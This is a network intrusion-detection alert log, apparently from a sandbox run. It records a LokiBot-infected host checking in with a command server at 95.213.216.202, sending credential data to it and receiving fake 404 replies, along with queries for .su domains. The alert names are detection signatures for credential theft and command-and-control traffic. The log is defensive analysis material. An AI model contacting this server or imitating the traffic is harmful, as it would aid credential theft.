192.168.2.695.213.216.20249721802024313 11/24/22-19:54:56.896268	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49721	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249750802021641 11/24/22-19:55:57.329298	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49750	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249715802024318 11/24/22-19:54:47.405096	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49715	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497302025483 11/24/22-19:55:17.735946	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49730	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249716802825766 11/24/22-19:54:48.704817	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49716	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249721802024318 11/24/22-19:54:56.896268	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49721	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.860032532014169 11/24/22-19:55:29.068969	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	60032	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249744802021641 11/24/22-19:55:45.028740	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49744	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497412025483 11/24/22-19:55:40.700457	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49741	95.213.216.202	192.168.2.6
95.213.216.202192.168.2.680497492025483 11/24/22-19:55:57.050677	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49749	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249709802024318 11/24/22-19:54:33.518227	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49709	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249715802024313 11/24/22-19:54:47.405096	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49715	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.858917532014169 11/24/22-19:55:11.700175	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	58917	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249745802024318 11/24/22-19:55:47.082758	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49745	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497342025483 11/24/22-19:55:26.886961	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49734	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249742802021641 11/24/22-19:55:40.973542	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49742	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497362025483 11/24/22-19:55:30.902353	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49736	95.213.216.202	192.168.2.6
95.213.216.202192.168.2.680497382025483 11/24/22-19:55:34.897313	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49738	95.213.216.202	192.168.2.6
95.213.216.202192.168.2.680497322025483 11/24/22-19:55:22.836179	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49732	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249739802021641 11/24/22-19:55:35.259290	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49739	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249741802825766 11/24/22-19:55:39.990050	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49741	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249728802025381 11/24/22-19:55:11.780324	TCP	2025381	ET TROJAN LokiBot Checkin	49728	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249745802024313 11/24/22-19:55:47.082758	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49745	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249713802825766 11/24/22-19:54:43.021097	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49713	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249746802025381 11/24/22-19:55:49.078874	TCP	2025381	ET TROJAN LokiBot Checkin	49746	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.853731532014169 11/24/22-19:54:11.254500	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	53731	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249702802024318 11/24/22-19:54:25.054966	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49702	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249713802025381 11/24/22-19:54:43.021097	TCP	2025381	ET TROJAN LokiBot Checkin	49713	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249738802825766 11/24/22-19:55:33.192742	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49738	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.861089532014169 11/24/22-19:55:53.045222	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	61089	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249714802021641 11/24/22-19:54:45.091814	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49714	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249720802024313 11/24/22-19:54:54.960633	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49720	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249702802024313 11/24/22-19:54:25.054966	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49702	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249720802024318 11/24/22-19:54:54.960633	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49720	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249731802025381 11/24/22-19:55:19.158567	TCP	2025381	ET TROJAN LokiBot Checkin	49731	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249735802024313 11/24/22-19:55:27.170416	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49735	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249698802024317 11/24/22-19:54:13.981663	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49698	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249698802024312 11/24/22-19:54:13.981663	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49698	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249729802021641 11/24/22-19:55:13.852615	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49729	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249721802025381 11/24/22-19:54:56.896268	TCP	2025381	ET TROJAN LokiBot Checkin	49721	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249731802825766 11/24/22-19:55:19.158567	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49731	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249712802024313 11/24/22-19:54:40.926341	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49712	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249712802024318 11/24/22-19:54:40.926341	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49712	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249735802024318 11/24/22-19:55:27.170416	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49735	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249724802021641 11/24/22-19:55:03.741584	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49724	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249748802825766 11/24/22-19:55:53.130311	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49748	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249753802024318 11/24/22-19:56:03.443038	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49753	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249753802024313 11/24/22-19:56:03.443038	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49753	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249730802024318 11/24/22-19:55:16.067382	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49730	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249747802021641 11/24/22-19:55:51.131718	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49747	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249738802025381 11/24/22-19:55:33.192742	TCP	2025381	ET TROJAN LokiBot Checkin	49738	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249730802024313 11/24/22-19:55:16.067382	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49730	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249706802021641 11/24/22-19:54:29.062049	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49706	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249705802025381 11/24/22-19:54:27.228813	TCP	2025381	ET TROJAN LokiBot Checkin	49705	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.863229532014169 11/24/22-19:54:48.619009	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	63229	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249721802825766 11/24/22-19:54:56.896268	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49721	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249722802024313 11/24/22-19:54:59.769485	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49722	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497432025483 11/24/22-19:55:44.744520	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49743	95.213.216.202	192.168.2.6
192.168.2.68.8.8.849786532014169 11/24/22-19:54:27.135932	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	49786	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249725802024313 11/24/22-19:55:05.694279	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49725	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249719802024318 11/24/22-19:54:53.033944	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49719	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249722802024318 11/24/22-19:54:59.769485	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49722	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249725802024318 11/24/22-19:55:05.694279	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49725	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.856123532014169 11/24/22-19:55:33.111651	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	56123	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249697802021641 11/24/22-19:54:11.348011	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49697	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249711802025381 11/24/22-19:54:38.624655	TCP	2025381	ET TROJAN LokiBot Checkin	49711	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249736802825766 11/24/22-19:55:29.163584	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49736	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497292025483 11/24/22-19:55:15.362841	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49729	95.213.216.202	192.168.2.6
95.213.216.202192.168.2.680497252025483 11/24/22-19:55:07.447890	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49725	95.213.216.202	192.168.2.6
95.213.216.202192.168.2.680497212025483 11/24/22-19:54:58.247548	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49721	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249750802024318 11/24/22-19:55:57.329298	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49750	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249737802021641 11/24/22-19:55:31.199874	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49737	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249751802825766 11/24/22-19:55:59.376338	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49751	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249740802021641 11/24/22-19:55:37.776321	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49740	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497022025483 11/24/22-19:54:26.773719	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49702	95.213.216.202	192.168.2.6
95.213.216.202192.168.2.680497062025483 11/24/22-19:54:30.867234	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49706	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249754802025381 11/24/22-19:56:04.818902	TCP	2025381	ET TROJAN LokiBot Checkin	49754	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249699802825766 11/24/22-19:54:15.956073	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49699	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249719802024313 11/24/22-19:54:53.033944	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49719	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249734802021641 11/24/22-19:55:25.189583	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49734	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249748802025381 11/24/22-19:55:53.130311	TCP	2025381	ET TROJAN LokiBot Checkin	49748	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249715802825766 11/24/22-19:54:47.405096	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49715	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249732802021641 11/24/22-19:55:21.169470	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49732	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249709802021641 11/24/22-19:54:33.518227	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49709	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249755802024318 11/24/22-19:56:06.881877	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49755	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249741802025381 11/24/22-19:55:39.990050	TCP	2025381	ET TROJAN LokiBot Checkin	49741	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249755802024313 11/24/22-19:56:06.881877	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49755	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249723802825766 11/24/22-19:55:01.692450	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49723	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.865044532014169 11/24/22-19:55:27.077654	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	65044	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249726802021641 11/24/22-19:55:07.738200	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49726	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249718802025381 11/24/22-19:54:50.807735	TCP	2025381	ET TROJAN LokiBot Checkin	49718	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249727802024313 11/24/22-19:55:09.788187	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49727	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249750802024313 11/24/22-19:55:57.329298	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49750	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249727802024318 11/24/22-19:55:09.788187	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49727	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249700802025381 11/24/22-19:54:18.249997	TCP	2025381	ET TROJAN LokiBot Checkin	49700	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249733802024313 11/24/22-19:55:23.201569	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49733	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497472025483 11/24/22-19:55:52.860690	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49747	95.213.216.202	192.168.2.6
192.168.2.68.8.8.856086532014169 11/24/22-19:55:05.605111	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	56086	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249728802825766 11/24/22-19:55:11.780324	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49728	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249733802024318 11/24/22-19:55:23.201569	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49733	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497502025483 11/24/22-19:55:59.104900	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49750	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249734802025381 11/24/22-19:55:25.189583	TCP	2025381	ET TROJAN LokiBot Checkin	49734	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249742802024318 11/24/22-19:55:40.973542	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49742	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497532025483 11/24/22-19:56:04.545301	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49753	95.213.216.202	192.168.2.6
95.213.216.202192.168.2.680497182025483 11/24/22-19:54:52.477982	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49718	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249751802024313 11/24/22-19:55:59.376338	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49751	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.860690532014169 11/24/22-19:56:01.353337	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	60690	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249748802024313 11/24/22-19:55:53.130311	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49748	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249701802825766 11/24/22-19:54:22.087876	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49701	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.854903532014169 11/24/22-19:54:50.721248	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	54903	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249743802025381 11/24/22-19:55:42.875605	TCP	2025381	ET TROJAN LokiBot Checkin	49743	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249742802024313 11/24/22-19:55:40.973542	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49742	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497152025483 11/24/22-19:54:48.216785	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49715	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249736802021641 11/24/22-19:55:29.163584	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49736	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249739802024313 11/24/22-19:55:35.259290	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49739	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249739802024318 11/24/22-19:55:35.259290	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49739	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249745802021641 11/24/22-19:55:47.082758	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49745	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249748802024318 11/24/22-19:55:53.130311	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49748	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680496992025483 11/24/22-19:54:17.569674	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49699	95.213.216.202	192.168.2.6
95.213.216.202192.168.2.680497102025483 11/24/22-19:54:37.501776	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49710	95.213.216.202	192.168.2.6
95.213.216.202192.168.2.680497122025483 11/24/22-19:54:42.610242	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49712	95.213.216.202	192.168.2.6
192.168.2.68.8.8.856547532014169 11/24/22-19:55:07.655761	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	56547	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249714802024313 11/24/22-19:54:45.091814	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49714	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249720802021641 11/24/22-19:54:54.960633	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49720	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249714802024318 11/24/22-19:54:45.091814	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49714	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249725802025381 11/24/22-19:55:05.694279	TCP	2025381	ET TROJAN LokiBot Checkin	49725	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249702802021641 11/24/22-19:54:25.054966	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49702	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249711802021641 11/24/22-19:54:38.624655	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49711	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.859504532014169 11/24/22-19:54:40.838615	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	59504	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249716802025381 11/24/22-19:54:48.704817	TCP	2025381	ET TROJAN LokiBot Checkin	49716	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249698802021641 11/24/22-19:54:13.981663	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49698	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249729802024318 11/24/22-19:55:13.852615	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49729	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249700802024318 11/24/22-19:54:18.249997	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49700	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249715802025381 11/24/22-19:54:47.405096	TCP	2025381	ET TROJAN LokiBot Checkin	49715	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249723802024318 11/24/22-19:55:01.692450	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49723	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249729802024313 11/24/22-19:55:13.852615	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49729	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249723802024313 11/24/22-19:55:01.692450	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49723	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.852556532014169 11/24/22-19:54:56.722023	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	52556	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249741802024318 11/24/22-19:55:39.990050	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49741	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249749802825766 11/24/22-19:55:55.139215	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49749	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249741802024313 11/24/22-19:55:39.990050	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49741	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249700802024313 11/24/22-19:54:18.249997	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49700	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497202025483 11/24/22-19:54:56.488535	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49720	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249718802021641 11/24/22-19:54:50.807735	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49718	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249701802021641 11/24/22-19:54:22.087876	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49701	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497482025483 11/24/22-19:55:54.888388	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49748	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249720802825766 11/24/22-19:54:54.960633	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49720	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.853107532014169 11/24/22-19:54:21.991089	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	53107	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249702802825766 11/24/22-19:54:25.054966	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49702	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249744802025381 11/24/22-19:55:45.028740	TCP	2025381	ET TROJAN LokiBot Checkin	49744	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497512025483 11/24/22-19:56:01.147373	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49751	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249730802021641 11/24/22-19:55:16.067382	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49730	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249743802825766 11/24/22-19:55:42.875605	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49743	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249710802024318 11/24/22-19:54:35.914327	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49710	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249724802825766 11/24/22-19:55:03.741584	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49724	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249727802825766 11/24/22-19:55:09.788187	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49727	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497452025483 11/24/22-19:55:48.824554	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49745	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249713802024318 11/24/22-19:54:43.021097	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49713	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249710802024313 11/24/22-19:54:35.914327	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49710	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249718802825766 11/24/22-19:54:50.807735	TCP	2825766	ETPRO TROJAN LokiBot Checkin M2	49718	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497092025483 11/24/22-19:54:35.412652	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49709	95.213.216.202	192.168.2.6
95.213.216.202192.168.2.680497232025483 11/24/22-19:55:03.460307	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49723	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249697802024312 11/24/22-19:54:11.348011	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49697	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249707802024313 11/24/22-19:54:31.276699	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49707	80	192.168.2.6	95.213.216.202
192.168.2.68.8.8.862520532014169 11/24/22-19:55:15.969759	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	62520	53	192.168.2.6	8.8.8.8
192.168.2.68.8.8.857322532014169 11/24/22-19:55:39.901358	UDP	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	57322	53	192.168.2.6	8.8.8.8
192.168.2.695.213.216.20249713802024313 11/24/22-19:54:43.021097	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49713	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249697802024317 11/24/22-19:54:11.348011	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49697	80	192.168.2.6	95.213.216.202
95.213.216.202192.168.2.680497262025483 11/24/22-19:55:09.535230	TCP	2025483	ET TROJAN LokiBot Fake 404 Response	80	49726	95.213.216.202	192.168.2.6
192.168.2.695.213.216.20249707802024318 11/24/22-19:54:31.276699	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49707	80	192.168.2.6	95.213.216.202
192.168.2.695.213.216.20249746802021641 11/24/22-19:55:49.078874	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49746	80	192.168.2.6	95.213.216.202
